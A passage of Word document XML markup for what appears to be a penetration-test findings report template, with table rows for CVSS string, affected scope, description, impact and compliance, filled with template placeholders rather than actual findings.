              <w:t>CVSS String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7636" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="562D6100" w14:textId="17B31D94">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>{cvss.vectorString}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="69694E02">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="52B0863A" w14:textId="515C1C6F">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Affected Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7636" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="6DBEAD81" w14:textId="339B19D8">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>{@affected | convertHTML}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="2D0B05CA">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="24CC5FBB" w14:textId="2814F554">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7636" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="4D73F9A1" w14:textId="70E25B9D">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>{#description}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="088C9A15" w14:textId="263903F0">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>{@text | convertHTML}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="494CFB35" w14:textId="24EE19D8">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>{#images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="6C7F408B" w14:textId="4131586A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>{%image}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="338A7C57" w14:textId="35A153A2">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>{caption}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="05AB4074" w14:textId="1DF3D9FC">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>{/images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="257CCCC8" w14:textId="1F425CB8">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>{/description}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="43E08A7E">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="604B7524" w14:textId="220F54BB">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7636" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="01C1D859" w14:textId="2E59F655">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="3B84C4EA">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="55240988" w14:textId="2B59BB6E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Technical Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7636" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="285FE421" w14:textId="7E39F998">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>All AD accounts, machines, and data are compromised.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="35080EF1">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="52DC377C" w14:textId="428B012A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Compliance Violations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7636" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="183247" w:sz="6"/>
              <w:left w:val="single" w:color="183247" w:sz="6"/>
              <w:bottom w:val="single" w:color="183247" w:sz="6"/>
              <w:right w:val="single" w:color="183247" w:sz="6"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="5EAD86E4" w14:textId="3BD9F607">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="374151"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
